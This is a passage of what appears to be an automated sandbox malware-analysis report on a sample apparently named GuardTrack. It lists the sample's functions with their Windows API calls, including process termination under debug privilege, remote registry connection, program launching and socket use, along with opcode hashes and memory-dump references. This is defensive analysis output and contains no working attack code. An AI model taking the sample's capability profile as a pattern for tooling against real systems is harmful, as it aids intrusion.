                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 2e8f0309e5698ce164190f1007e662b1d59e506f9d13929e863ce54531ab1892
                                                          • Instruction ID: a710323018a828a4a3a4350a21a2ddcd4f65cf874ddf30de20b45a9a55c57b03
                                                          • Opcode Fuzzy Hash: 2e8f0309e5698ce164190f1007e662b1d59e506f9d13929e863ce54531ab1892
                                                          • Instruction Fuzzy Hash: 81C18F71A0062A9FDF14DF98D884AEEB7F6BB48350F148469E905EB280E7B09D458F51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-625585964
                                                          • Opcode ID: 7df0d6320b67ec0f9830ed97df23492d468ffbdde1a024eaebc81a1bd450c8b3
                                                          • Instruction ID: 8d341e6e2cc77e2e6340e728625d11a990322533c62aa1d861216823cea18b26
                                                          • Opcode Fuzzy Hash: 7df0d6320b67ec0f9830ed97df23492d468ffbdde1a024eaebc81a1bd450c8b3
                                                          • Instruction Fuzzy Hash: 3191AF70A00629ABDF24CFA5D848FEEBBBAEF85710F14855DF515AB240D7709941CFA0
                                                          APIs
                                                            • Part of subcall function 00607D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?,?,00608073), ref: 00607D45
                                                            • Part of subcall function 00607D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D60
                                                            • Part of subcall function 00607D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D6E
                                                            • Part of subcall function 00607D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?), ref: 00607D7E
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00629EF0
                                                          • _memset.LIBCMT ref: 00629EFD
                                                          • _memset.LIBCMT ref: 0062A040
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0062A06C
                                                          • CoTaskMemFree.OLE32(?), ref: 0062A077
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 0062A0C5
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: d18c784a4b296afed73fa69aee7f0c78ab1463613bfd7641868900e18b56353d
                                                          • Instruction ID: 6eaadd7f826ae7e1ea394e15812b95a617fcbc7cf0a7d8b08ce458a6c7b1f712
                                                          • Opcode Fuzzy Hash: d18c784a4b296afed73fa69aee7f0c78ab1463613bfd7641868900e18b56353d
                                                          • Instruction Fuzzy Hash: B2913571D00229ABDB20DFA5D844EDEBBBABF49310F10811AF519A7281DB719A45CFA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00637449
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0063745D
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00637477
                                                          • _wcscat.LIBCMT ref: 006374D2
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 006374E9
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00637517
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: dafa3401970580e8e2fe89accc52bc2ca62f133d7edc55dd722611a4028a14dc
                                                          • Instruction ID: 0cd88ab83b61e12647834cd75a678d4bf6b2c93a621fab565df2c8802bff20f6
                                                          • Opcode Fuzzy Hash: dafa3401970580e8e2fe89accc52bc2ca62f133d7edc55dd722611a4028a14dc
                                                          • Instruction Fuzzy Hash: 3A41A771904349AFEB319F64CC85BEE7BEAEF48350F10442AFA85E7291D6719D84CB90
                                                          APIs
                                                            • Part of subcall function 00614148: CreateToolhelp32Snapshot.KERNEL32 ref: 0061416D
                                                            • Part of subcall function 00614148: Process32FirstW.KERNEL32(00000000,?), ref: 0061417B
                                                            • Part of subcall function 00614148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00614245
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0062F08D
                                                          • GetLastError.KERNEL32 ref: 0062F0A0
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0062F0CF
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0062F14C
                                                          • GetLastError.KERNEL32(00000000), ref: 0062F157
                                                          • CloseHandle.KERNEL32(00000000), ref: 0062F18C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 1701285019-2896544425
                                                          • Opcode ID: f15760bc87cd055a5e15c8f904832da7503ecde11c557b58cac0abf71c103c79
                                                          • Instruction ID: f726d299116aa2ebd3860090fef740eaf2822a11aa415e3e9e7b01a502e65786
                                                          • Opcode Fuzzy Hash: f15760bc87cd055a5e15c8f904832da7503ecde11c557b58cac0abf71c103c79
                                                          • Instruction Fuzzy Hash: B24180312002119FD725EF64DC99FAEB7A6AF84714F08846CF9425B3D2CB74A815CF95
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00614802
                                                          • LoadStringW.USER32(00000000), ref: 00614809
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0061481F
                                                          • LoadStringW.USER32(00000000), ref: 00614826
                                                          • _wprintf.LIBCMT ref: 0061484C
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0061486A
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00614847
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: 69228ea035ad01ec6c5f1b981eafa7b5f04f5186ab9cdb01bb9cd57beb7f5c9f
                                                          • Instruction ID: 1ade3e06484e8023d36046980c471511ac10461585ae7897f370e2a881ff70f1
                                                          • Opcode Fuzzy Hash: 69228ea035ad01ec6c5f1b981eafa7b5f04f5186ab9cdb01bb9cd57beb7f5c9f
                                                          • Instruction Fuzzy Hash: 1D01A2F69002187FF751DBA09D89EF6777EE709301F000196BB0AE3141EA309E848B71
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • GetSystemMetrics.USER32(0000000F), ref: 0063DB42
                                                          • GetSystemMetrics.USER32(0000000F), ref: 0063DB62
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0063DD9D
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0063DDBB
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0063DDDC
                                                          • ShowWindow.USER32(00000003,00000000), ref: 0063DDFB
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0063DE20
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0063DE43
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: 9676bdb853a389ff8616464096649bf2d9450120b19f45010476cfb7f4d1ef01
                                                          • Instruction ID: 0f5b82072eb8b2a6ecb1126195aa0de8ea82fb93370361128fb29b7d29917d40
                                                          • Opcode Fuzzy Hash: 9676bdb853a389ff8616464096649bf2d9450120b19f45010476cfb7f4d1ef01
                                                          • Instruction Fuzzy Hash: 8CB19975A00225EFDF18CF69D9857ED7BB2FF04701F088069ED489E295DB30A990CBA0
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0063044E
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3479070676-0
                                                          • Opcode ID: 8ac6dbc3ea52f13db0f5d48bf62ce129abb99eba298988d7da38aa33666140e2
                                                          • Instruction ID: bac28585be98452f9e3814ce46fa19ab75a5789e135adcebbd576c7e6d5abb23
                                                          • Opcode Fuzzy Hash: 8ac6dbc3ea52f13db0f5d48bf62ce129abb99eba298988d7da38aa33666140e2
                                                          • Instruction Fuzzy Hash: 57A18C302042029FD710EF64C895F6EBBE6BF85314F14891DF5968B2A2DB31E955CF86
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000), ref: 005B2E9F
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000,000000FF), ref: 005B2EE7
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000), ref: 005EC55B
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,005EC508,00000004,00000000,00000000,00000000), ref: 005EC5C7
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 3c79d4834b1f5ac58ca19d2f0ca5fdf5b971ea550b2be6984e808db4d7607fcf
                                                          • Instruction ID: d795a1894977ea21bd482466432b153eff9500da2703e17cf6b6a2b7e3644e3a
                                                          • Opcode Fuzzy Hash: 3c79d4834b1f5ac58ca19d2f0ca5fdf5b971ea550b2be6984e808db4d7607fcf
                                                          • Instruction Fuzzy Hash: 2241DB306046C09AD739472B8DCC7FA7F9ABB86300F14481EE58786660C775F885D731
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00636810
                                                          • GetDC.USER32(00000000), ref: 00636818
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00636823
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0063682F
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0063686B
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0063687C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0063964F,?,?,000000FF,00000000,?,000000FF,?), ref: 006368B6
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006368D6
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 68473936136d80cd05d6669207b33c609688f9f7b8735006ffc07043a4c64305
                                                          • Instruction ID: 10c0bc61a655cf0c32846b175b1a4224f973eba2f38d24071ae134e9503e6f8a
                                                          • Opcode Fuzzy Hash: 68473936136d80cd05d6669207b33c609688f9f7b8735006ffc07043a4c64305
                                                          • Instruction Fuzzy Hash: 83316B76101224BFEB118F50CC8AFEA3BAAEF4A761F044065FF089A291C6759851CBB4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 52d125fe49a0acf4730acd845f5b18614938bb7f74cb918bd189780dc216e0d5
                                                          • Instruction ID: 4ff69ce21e31cb2570f1fd7abb377e2246e0f991367f0bbdb3ea637f8a135bb5
                                                          • Opcode Fuzzy Hash: 52d125fe49a0acf4730acd845f5b18614938bb7f74cb918bd189780dc216e0d5
                                                          • Instruction Fuzzy Hash: 0B2107726816167BD31877148F86FEB3B6FEE60764B044222FD02A67C3E710DE11C6A9
                                                          APIs
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                            • Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D
                                                          • _wcstok.LIBCMT ref: 0061F2D7
                                                          • _wcscpy.LIBCMT ref: 0061F366
                                                          • _memset.LIBCMT ref: 0061F399
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: 68cf10f59fdfb12466e220c4ed78853aeafa456229bb6afc08bf83a1cffae243
                                                          • Instruction ID: 037700b97007e41987b1e4e87b04651ebb8e30d00950dd94c9c6efc789492c18
                                                          • Opcode Fuzzy Hash: 68cf10f59fdfb12466e220c4ed78853aeafa456229bb6afc08bf83a1cffae243
                                                          • Instruction Fuzzy Hash: A4C1AE715047429FC724EF64C889E9ABBE5BF85310F04492DF89A973A2DB30ED45CB86
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006272EB
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0062730C
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0062731F
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 006273D5
                                                          • inet_ntoa.WSOCK32(?), ref: 00627392
                                                            • Part of subcall function 0060B4EA: _strlen.LIBCMT ref: 0060B4F4
                                                            • Part of subcall function 0060B4EA: _memmove.LIBCMT ref: 0060B516
                                                          • _strlen.LIBCMT ref: 0062742F
                                                          • _memmove.LIBCMT ref: 00627498
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3619996494-0
                                                          • Opcode ID: 07f529a914451d78ba38fb529c0950d651541f083b6c54e86d882b13878c5d9c
                                                          • Instruction ID: 18f6a23206a6f059b6e1a16f97af87cf821486a16b050dd8c97615823af987b4
                                                          • Opcode Fuzzy Hash: 07f529a914451d78ba38fb529c0950d651541f083b6c54e86d882b13878c5d9c
                                                          • Instruction Fuzzy Hash: F081EF71508611AFD324EB24DC89FABBBEAEFC4714F10451DF9519B292EA70ED01CB92
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f083ea21b498039ab6bb466f49048cb8b0bbd20bf6318e0cfa40770067f90d2
                                                          • Instruction ID: 7fb649e497e5bb07b48847b30fd43342d4d62d13ad5a3d30faffdc0141078092
                                                          • Opcode Fuzzy Hash: 7f083ea21b498039ab6bb466f49048cb8b0bbd20bf6318e0cfa40770067f90d2
                                                          • Instruction Fuzzy Hash: 5B717A34900509EFDB088F99CC98AFEBF79FF86311F648159F915AB251C730AA51CBA4
                                                          APIs
                                                          • IsWindow.USER32(00FF5C60), ref: 0063BA5D
                                                          • IsWindowEnabled.USER32(00FF5C60), ref: 0063BA69
                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0063BB4D
                                                          • SendMessageW.USER32(00FF5C60,000000B0,?,?), ref: 0063BB84
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 0063BBC1
                                                          • GetWindowLongW.USER32(00FF5C60,000000EC), ref: 0063BBE3
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0063BBFB
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: eff290ede745e7ac7e75685297a488b1dd9bfbdcfe782eb83979ee301eb9a351
                                                          • Instruction ID: ea32af58253edeb2b35a9abc71b5c17e5e72c0c1380bf221a9f04947356003de
                                                          • Opcode Fuzzy Hash: eff290ede745e7ac7e75685297a488b1dd9bfbdcfe782eb83979ee301eb9a351
                                                          • Instruction Fuzzy Hash: 2D71A034604604AFEB249F54C895FFABBB7EF4A300F146059EA4A97361CB31AD51CBA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 0062FB31
                                                          • _memset.LIBCMT ref: 0062FBFA
                                                          • ShellExecuteExW.SHELL32(?), ref: 0062FC3F
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                            • Part of subcall function 005C436A: _wcscpy.LIBCMT ref: 005C438D
                                                          • GetProcessId.KERNEL32(00000000), ref: 0062FCB6
                                                          • CloseHandle.KERNEL32(00000000), ref: 0062FCE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
